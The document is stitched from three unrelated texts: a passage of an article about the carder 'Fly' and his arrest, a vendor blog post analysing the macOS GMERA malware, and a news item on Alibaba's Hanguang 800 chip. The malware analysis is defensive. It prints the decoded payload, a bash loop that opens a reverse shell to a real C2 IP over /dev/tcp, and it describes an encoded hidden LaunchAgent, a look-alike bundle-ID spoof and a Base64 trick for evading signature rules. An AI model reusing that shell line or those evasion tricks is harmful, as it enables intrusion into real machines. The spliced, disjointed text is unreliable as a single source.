Cocaine and hash were plentiful at his employer’s place of work, and Vovnenko said he availed himself of both abundantly. After he’d saved enough to buy a computer, Fly started teaching himself how to write programs and hack stuff. He quickly became enthralled with the romanticized side of cybercrime — the allure of instant cash — and decided this was his true vocation.

“After watching movies and reading books about hackers, I really wanted to become a sort of virtual bandit who robs banks without leaving home,” Vovnenko recalled. “Once, out of curiosity, I wrote an SMS bomber that used a registration form on a dating site, bypassing the captcha through some kind of rookie mistake in the shitty code. The bomber would launch from the terminal and was written in Perl, and upon completion of its work, it gave out my phone number and email. I shared the bomber somewhere on one of my many awkward sites.”

“And a couple of weeks later they called me. Nah, not the cops, but some guy who comes from Sri Lanka who called himself Enrico. He told me that he used my program and earned a lot of money, and now he wants to share some of it with me and hire me. By a happy coincidence, the guy also lived in Naples.”

“When we met in person, he told me that he used my bomber to fuck with a telephone company called Wind. This telephone company had such a bonus service: for each incoming SMS you received two cents on the balance. Well, of course, this guy bought a bunch of SIM cards and began to bomb them, getting credits and loading them into his paid lines, similar to how phone sex works.”

But his job soon interfered with his drug habit, and he was let go.

“At the meeting, Enrico gave me 2K euros, and this was the first money I’ve earned, as it is fashionable to say these days, on ‘cybercrime’. I left my previous job and began to work closely with Enrico. But always stoned out of my mind, I didn’t do a good job and struggled with drug addiction at that time. I was addicted to cocaine, as a result, I was pulling a lot more money out of Enrico than my work brought him. And he kicked me out.”

After striking out on his own, Vovnenko says he began getting into carding big time, and was introduced to several other big players on the scene. One of those was a cigarette smuggler who used the nickname Ponchik (“Doughnut”).

I wonder if this is the same Ponchik who was arrested in 2013 as being the mastermind behind the Blackhole exploit kit, a crimeware package that fueled an overnight explosion in malware attacks via Web browser vulnerabilities.

In any case, Vovnenko had settled on some schemes that were generating reliably large amounts of cash.

“I’ve never stood still and was not focusing on carding only, with the money I earned, I started buying dumps and testing them at friends’ stores,” Vovnenko said. “Mules, to whom I signed the hotlines, were also signed up for cashing out the loads, giving them a mere 10 percent for their work. Things seemed to be going well.”

FAN MAIL

There is a large chronological gap in Vovnenko’s account of his cybercrime life story from that point on until the time he and his forum friends started sending heroin, large bags of feces and other nasty stuff to our Northern Virginia home in 2013.

Vovnenko claims he never sent anything and that it was all done by members of his forum.

-Tell me about the packages to Krebs.
“That ain’t me. Suitcase filled with sketchy money, dildoes, and a bouquet of coffin wildflowers. They sent all sorts of crazy shit. Forty or so guys would send. When I was already doing time, one of the dudes sent it. By the way, Krebs wanted to see me. But the lawyer suggested this was a bad idea. Maybe he wanted to look into my eyes.”

In one part of the interview, Fly is asked about but only briefly touches on how he was caught. I wanted to add some context here because this part of the story is richly ironic, and perhaps a tad cathartic.

Around the same time Fly was taking bitcoin donations for a fund to purchase heroin on my behalf, he was also engaged to be married to a nice young woman. But Fly apparently did not fully trust his bride-to-be, so he had malware installed on her system that forwarded him copies of all email that she sent and received.

Fly/Flycracker discussing the purchase of a gram of heroin from Silk Road seller “10toes.”

But Fly would make at least two big operational security mistakes in this spying effort: First, he had his fiancée’s messages forwarded to an email account he’d used for plenty of cybercriminal stuff related to his various “Fly” identities.

Mistake number two was the password for his email account was the same as one of his cybercrime forum admin accounts. And unbeknownst to him at the time, that forum was hacked, with all email addresses and hashed passwords exposed.

Soon enough, investigators were reading Fly’s email, including the messages forwarded from his wife’s account that had details about their upcoming nuptials, such as shipping addresses for their wedding-related items and the full name of Fly’s fiancée. It didn’t take long to zero in on Fly’s location in Naples.

While it may sound unlikely that a guy so enmeshed in the cybercrime space could make such rookie security mistakes, I have found that a great many cybercriminals actually have worse operational security than the average Internet user.

I suspect this may be because the nature of their activities requires them to create vast numbers of single- or brief-use accounts, and in general they tend to re-use credentials across multiple sites, or else pick very poor passwords — even for critical resources.

In addition to elaborating on his hacking career, Fly talks a great deal about his time in various prisons (including their culinary habits), and an apparent longing or at least lingering fondness for the whole carding scene in general.

Towards the end, Fly says he’s considering going back to school, and that he may even take up information security as a field of study. I wish him luck in that endeavor, whatever it turns out to be, as long as he can also avoid stealing from people.

I don’t know what I would have written many years ago to Fly had I not been already so traumatized by receiving postal mail from him. Perhaps it would go something like this:

“Dear Fly: Thank you for your letters. I am very sorry to hear about the delays in your travel plans. I wish you luck in all your endeavors — and I sincerely wish the next hopeful opportunity you alight upon does not turn out to be a pile of shit.”

The entire translated interview is here (PDF). Fair warning: Many readers may find some of the language and topics discussed in the interview disturbing or offensive.

Detecting macOS.GMERA Malware Through Behavioral Inspection

Last week, researchers at Trend Micro spotted a new piece of in-the-wild macOS malware that spoofs a genuine stock market trading app to open a backdoor and run malicious code. In this post, we first give an overview of how the malware works, and then use this as an example to discuss different detection and response strategies, with a particular emphasis on explaining the principles and advantages of using behavioral detection on macOS.


An Overview of GMERA Malware

Let’s begin by taking a look at the technical details of this new piece of macOS malware. 

Two variants were initially discovered by researchers who identified them as GMERA.A and GMERA.B. In this post, we will focus on the interesting points in a particular sample of GMERA.B that pertain to detection and response. 

Our sample, which was not analyzed in the previous research, is:

d2eaeca25dd996e4f34984a0acdc4c2a1dfa3bacf2594802ad20150d52d23d68

Despite having been on VirusTotal for 9 days already, and despite the fact that the initial Trend Micro research hit the news 5 days ago, this particular sample remains undetected by reputation engines on the VT site as of today.


As with the GMERA.A variant, the malware comes in a macOS application bundle named “Stockfoli.app”. The name is a letter shy of a genuine app called “Stockfolio.app”, which the malware purports to be a copy of, and which is placed inside the malicious Stockfoli.app’s Resources folder.


The Stockfolio.app inside the Resources folder appears to be an undoctored version of the genuine app, save for the fact that the malware authors have replaced the original developer’s code signature with their own. We will come back to code signing in the next section.

Of particular note in the Resources folder is the malicious run.sh script. 


We can see that in this sample the script contains a bunch of lightly encoded base64, and that upon decoding it, the script writes the contents out as a hidden property list file in the ~/Library/LaunchAgents folder, in this case with the file name .com.apple.upd.plist.

Upon decoding the base64, we see the dropped property list file itself contains more encoded base64 in its Program Arguments.


Further decoding reveals a bash script that opens a reverse shell to the attackers’ C2.

while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25733 0>&1'; done

The code sleeps for 10000 seconds, then quits and kills any previous connection. The screen utility is then used to start a new session in ‘detached’ mode. This essentially allows the attacker to resume the same session if the connection should drop at any point. The script then invokes Bash’s interactive mode to redirect the session to the attacker’s device at the address shown above over port 25733. In their write-up, the Trend Micro researchers reported seeing the reverse shell used over ports 25733 to 25736. Disassembly of the main binary in our sample shows that two further ports, 25737 and 25738, may also be utilized, with the latter used with zsh rather than bash as the shell of choice.


Before we move on to discuss detection and response, let’s note one further characteristic of the malware not pointed out in the previous research. The malicious Stockfoli.app’s Info.plist is being distributed with at least two different bundle identifiers (we’re sure there will be more). These are:

com.appIe.stockf.stocks
com.appIe.stockfolioses.Stockfoli

Looked at casually, those look like they begin with ‘com.apple’. But closer inspection (or changing the font) reveals that the ‘l’ in “apple” is in fact a capital “I”.

com.appIe.stockf.stocks
com.appIe.stockfolioses.Stockfoli

We will come back to the reason for this ruse below. 

CERT REVOKED WHACK-A-MOLE

Let’s turn to detection and response. If you’re a Mac user running an unprotected Mac (i.e., you’re not using a Next-Gen solution like SentinelOne), you might be glad to hear that these malicious samples should now fail to execute if you try to download and run them. That’s due to the fact that Apple have since revoked the code signature used to sign these samples. 


While it’s great to see Apple on the ball and revoking the signatures of known malware, this kind of after-the-fact protection shouldn’t provide as much comfort as some seem to take from it. A fellow macOS enthusiast remarked to me after this latest discovery that Apple’s action proved to him that Macs are secure against malware, to which my somewhat more circumspect response was: how long was this malware in the wild before it was discovered and the signature revoked? How many users were infected by this malware before it became publicly known? How many unknown, validly signed malware samples are still out there?

It won’t be long before the threat actors package their wares in a newly signed bundle and the game of whack-a-mole begins again: attackers create and distribute a malicious app with a valid code signature; after some variable amount of time in the wild, the malware is discovered and Apple revoke the signature; the attackers then repackage the malware with a fresh signature and the process begins all over again!

If you’re the victim, a day, an hour, or even a minute is too late if you’re relying on this kind of mechanism to protect you. In fact, it inherently relies on some people becoming victims in order for samples to be discovered and signatures revoked in the first place. Cold comfort if you’re one of the unfortunate early victims!

Perhaps not widely appreciated is just how easy it is for bad actors to acquire valid code signing identities. Given the rewards, bad actors are quite happy to burn $99 subscriptions and play whack-a-mole with Apple. This is relatively easy to do as there are many fake and compromised (i.e., hacked) AppleIDs that can be turned into developer signatures using stolen credit cards and other payment methods. 

Repackaging the same malicious script inside a new app bundle with a new cert is a task that can be automated with very little effort; it is a technique we see the commodity adware and PUP players use on a daily basis.

YARA YARA, YADA YADA…

To be fair, Apple don’t just rely on revoking certs of discovered malware though. Indeed, they have been talking a lot about ‘defense in depth’ recently (WWDC 2019), and as regular readers of this blog will know, Apple have a suite of built-in tools like Gatekeeper, XProtect and MRT to help block and remediate known malware. With the upcoming Catalina release, Apple will add compulsory notarization to their armoury, too.

These tools rely on a combination of different strategies, from extended file attributes, hardcoded file paths and hashes to Yara rules that specify particular characteristics of a binary. While hashes and file paths are typically limited to a single variant of malware, Yara rules at least have the advantage that they can be used to identify families of malware that share similar characteristics. Here’s an example from XProtect:

[Image: XProtect Yara rule for the malware family MACOS.6175e25]

This Yara rule specifies five sets of strings; if they all appear in a Mach-O executable with a file size of less than 200KB, XProtect should block the file as a member of the malware family MACOS.6175e25. Let’s translate those strings from hex to see what they actually are:

[Image: the Yara rule’s hex strings translated to readable text]

To be clear, this rule has nothing to do with the GMERA malware under discussion here. At the time of writing, neither XProtect nor MRT.app have been updated to detect GMERA malware. The point here is to show how Yara rules in general work. The rule shown above is in fact for some malware we’ve reversed before. From the malware author’s point of view, it is easy to see just what XProtect is hitting on, and with that knowledge, to adapt his or her work. 

But wouldn’t that be difficult? Not at all. It’s far less work for malware authors than it is for Apple. A simple trick for malware authors to use to avoid Yara rules like the above is simply to rename methods (it would only take a letter different to break that rule above), or to use an encoding like base64, which can be encoded multiple times. There really are numerous ways to make minor changes that will break Yara rules. Meanwhile, Apple (and 3rd party security vendors that rely on the same techniques) have to wait until the changes come to light, then test and update their revised signatures. All the while, the threat actors are achieving compromises while Apple and other vendors continually have to play catch-up, knowing full-well that their updated signatures will be obsolete within hours.
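A toy example makes the point. The ‘payload’ and the rule below are invented for the demonstration; the takeaway is that a single extra layer of encoding is enough to blind an exact string match:

import base64

payload = b"osascript -e 'display dialog'"    # stand-in for a malicious string
signature = payload                            # a naive rule: match the raw string

build_v1 = b"#!/bin/bash\n" + payload          # the build the rule was written against
build_v2 = (b"#!/bin/bash\necho " + base64.b64encode(payload)
            + b" | base64 -D | bash")          # same behavior, re-encoded once

print(signature in build_v1)   # True  -- the rule fires
print(signature in build_v2)   # False -- trivial change, the rule goes blind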

A crucial part of this unwinnable game is that, as with revoking certs, file paths, hashes and Yara rules all have one fatal weakness: they rely on prior discovery of a sample. Once again, after-the-fact detection is no solace for the before-everyone-else-heard-about-it victims.

Beating macOS Malware By Detecting Suspicious Behavior

Fortunately, there is another way to detect and block malware which doesn’t rely on prior knowledge. Malware and threat actors have limited and specific goals. While the implementation details can be vast and varied, the actual behavior required to meet those objectives is both finite and definable.  With a behavioral detection engine, the implementation details become entirely irrelevant. 

Just as we do not detect criminals by looking at the way their brains are wired or measuring the shape and size of their skulls (anymore!) but rather by assessing the way they act against expected social and legal norms, so we can do the same with malicious software, scripts and processes. 

Regardless of the inner wiring, malicious processes – like criminals – engage in certain kinds of undesirable behavior. By tracking and contextualizing individual events in the process lifecycle, we can put together a picture or ‘story’ that says:

“Taken together, these events constitute undesirable behavior and we should alert on and/or block them.”

By focusing on dynamic behavior rather than relying on static characteristics like strings, hashes and paths, we can identify malware even if we have not seen its particular implementation previously.

This is the principle behind SentinelOne’s behavioral and AI engines. Although I can’t go into the actual details of how SentinelOne does its magic under the hood, we can get a sense of how behavioral detection works in principle by looking at the GMERA malware as an example. 

As we have seen, the macOS.GMERA malware writes a persistence agent to ~/Library/LaunchAgents. If you were manually threat hunting on macOS, a newly written LaunchAgent would immediately cause you to investigate further, and the same can be true for automated responses. We also saw that in the case of the GMERA malware, the parent process dropped a persistence agent that was made invisible in the Finder by prefixing a period to the filename. 
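Those observations are easy to turn into a simple hunting script. The sketch below is a heuristic illustration only (not SentinelOne’s engine): it flags hidden plists in ~/Library/LaunchAgents and agents whose ProgramArguments carry long Base64 blobs.

import base64
import plistlib
from pathlib import Path

agents_dir = Path.home() / "Library" / "LaunchAgents"

def has_base64_args(plist: dict) -> bool:
    # look for long tokens that decode cleanly as Base64
    for arg in plist.get("ProgramArguments", []):
        for tok in str(arg).split():
            if len(tok) > 60:
                try:
                    base64.b64decode(tok, validate=True)
                    return True
                except Exception:
                    pass
    return False

for p in agents_dir.iterdir():
    if p.suffix != ".plist":
        continue
    hidden = p.name.startswith(".")
    try:
        with p.open("rb") as fh:
            data = plistlib.load(fh)
    except Exception:
        continue
    if hidden or has_base64_args(data):
        print(f"[suspicious] {p}  hidden={hidden}  b64_args={has_base64_args(data)}")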


That should raise our suspicion even further. Such behavior is not only unusual for legitimate software but is also behavior that has no legitimate purpose. The primary reason for allowing processes to write invisible files is to hide temporary data and metadata that have no conceivable interest to the user. While there may be a few other legitimate uses (such as DRM licensing and such like), there’s little reason why a genuine persistence agent should be invisible to the user in the Finder. 

Thirdly, this LaunchAgent’s behavior itself is anomalous. Rather than executing a file at a given path, it decodes and executes in memory a script that is obfuscated with base64. While there’s no doubt some conceivable edge case where this might be legitimate, in the typical enterprise situation such behaviour is almost certainly designed to deceive and something we should be alerting on. Even the edge cases are worthy of our attention, if only to encourage wayward users to engage in better, safer and more transparent practices.

Finally, as we noted above, the parent application uses a bundle Identifier that is clearly intended to mislead. 

This is a sleight-of-hand intended to trick unwary users, who may easily overlook such a process as benign. The tactic may also trick some unsophisticated security solutions that check whether processes with a “com.apple” bundle identifier are actually signed with Apple’s signature. Replacing the ‘l’ in Apple with a capital ‘I’ would neatly sidestep such a heuristic. 

If you were writing a detection engine, you might consider that as something to look out for – homograph attacks are a tried and trusted technique in URL and Domain Name spoofing – but you might equally well not care either way. It matters less what a file is called and more what it does. A hidden persistence mechanism opening a reverse shell in memory that has been dropped by an application with no apparent functional relation? What could be more suspicious than that?
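As a simple illustration (not SentinelOne’s detection logic), a check for this particular ruse only needs to normalize a few look-alike characters before comparing the prefix:

# flag bundle identifiers that render like "com.apple" but aren't
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "0": "o"})   # partial look-alike map

def spoofs_apple(bundle_id: str) -> bool:
    prefix = ".".join(bundle_id.split(".")[:2])
    normalized = prefix.translate(CONFUSABLES).lower()
    return normalized == "com.apple" and prefix.lower() != "com.apple"

for b in ["com.appIe.stockf.stocks", "com.appIe.stockfolioses.Stockfoli", "com.apple.Safari"]:
    print(b, spoofs_apple(b))   # True, True, False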

Detecting GMERA Malware Through Behavioral Inspection

So much for the theory, but does it work in practice? Despite the fact the GMERA malware application bundle itself will fail to run once the cert has been revoked (unless we were to remove the code signing or resign it with an ad hoc cert), it is still perfectly possible to execute the malicious run.sh script bundled in the application’s Resources folder without complaint from Apple’s built-in security tools. That means we can still test a significant part of the malware’s behaviour. And of course, it means an attacker could do this manually, and so could another malicious process that found the Stockfoli.app bundle lying around, perhaps in a subsequent infection incident.

Let’s see how the SentinelOne behavioral engine reacts to execution of the run.sh script. As soon as we execute the script, we get a detection on the Agent side.

[Image: detection alert on the SentinelOne Agent]

We can see more details on the Management console side:

[Image: detection details in the SentinelOne Management console]

Note the MITRE ATT&CK TTPs:

Process dropped a hidden suspicious plist to achieve persistency {T1150}
Process wrote a hidden file to achieve persistency {T1158}
Process achieved persistency through launchd job {T1160}

As we have set the policy on our test machine to detect rather than block — so that we can inspect the malware’s behavior — SentinelOne lets the script continue its execution. The Attack Story Line shows the hierarchy of processes and the entire kill chain.

[Image: Attack Story Line showing the process hierarchy and kill chain]

Of course, in a live deployment you would set the policy to simply block this at the outset. For research purposes, however, the Detect Only policy is useful to examine the malware’s behavior and learn more about our adversaries’ TTPs.

Conclusion

The recently discovered GMERA malware doesn’t offer anything new in terms of attacker tools, tactics and procedures. It leverages a fairly well-worn, easily-constructed route to compromise and persistence: a fake app, a Launch Agent for persistence and a simple bash- or zsh-based reverse shell to open the victim up to post-exploitation, data exfiltration and perhaps further infection. And yet, so many solutions – including Apple’s built-in offerings – fail to detect these kinds of threats pre-execution or on-execution, instead relying on discovery and software updates to belatedly offer protection to those that were lucky enough to avoid becoming victims in the first wave.

A solution that offers real defense-in-depth, with multiple static, behavioral and AI engines packaged in a single agent is the only way to stay ahead of attackers and protect your Mac users from whatever new threat comes next. Remember, malware authors can innovate to their hearts’ content, but insofar as they keep on acting suspiciously, we can keep on rooting them out. 

Would you like to see how SentinelOne can work for you? Contact us for a free demo.



Read more about Cyber Security

Alibaba unveils Hanguang 800, an AI inference chip it says significantly increases the speed of machine learning tasks

Alibaba Group introduced its first AI inference chip today, a neural processing unit called Hanguang 800 that it says makes performing machine learning tasks dramatically faster and more energy efficient. The chip, announced today during Alibaba Cloud’s annual Apsara Computing Conference in Hangzhou, is already being used to power features on Alibaba’s e-commerce sites, including product search and personalized recommendations. It will be made available to Alibaba Cloud customers later.

As an example of what the chip can do, Alibaba said it usually takes Taobao an hour to categorize the one billion product images that are uploaded to the e-commerce platform each day by merchants and prepare them for search and personalized recommendations. Using Hanguang 800, Taobao was able to complete the task in only five minutes.

Alibaba is already using Hanguang 800 in many of its business operations that need machine processing. In addition to product search and recommendations, this includes automatic translation on its e-commerce sites, advertising and intelligent customer services.

Though Alibaba hasn’t revealed when the chip will be available to its cloud customers, the chip may help Chinese companies reduce their dependence on U.S. technology as the trade war makes business partnerships between Chinese and American tech companies more difficult. It also can help Alibaba Cloud grow in markets outside of China. Within China, it is the market leader, but in the Asia-Pacific region, Alibaba Cloud still ranks behind Amazon, Microsoft and Google, according to the Synergy Research Group.

Hanguang 800 was created by T-Head, the unit that leads the development of chips for cloud and edge computing within Alibaba DAMO Academy, the global research and development initiative in which Alibaba is investing more than $15 billion. T-Head developed the chip’s hardware and algorithms designed for business apps, including Alibaba’s retail and logistics apps.

In a statement, Alibaba Group CTO and president of Alibaba Cloud Intelligence Jeff Zhang said, “The launch of Hanguang 800 is an important step in our pursuit of next-generation technologies, boosting computing capabilities that will drive both our current and emerging businesses while improving energy-efficiency.”

He added, “In the near future, we plan to empower our clients by providing access through our cloud business to the advanced computing that is made possible by the chip, anytime and anywhere.”

T-Head’s other launches included the XuanTie 910 earlier this year, an IoT processor based on RISC-V, the open-source hardware instruction set that began as a project at UC Berkeley. XuanTie 910 was created for heavy-duty IoT applications, including edge servers, networking, gateway and autonomous vehicles.

Alibaba DAMO Academy collaborates with universities around the world, including UC Berkeley and Tel Aviv University. Researchers in the program focus on machine learning, network security, visual computing and natural language processing, with the goal of serving two billion customers and creating 100 million jobs by 2035.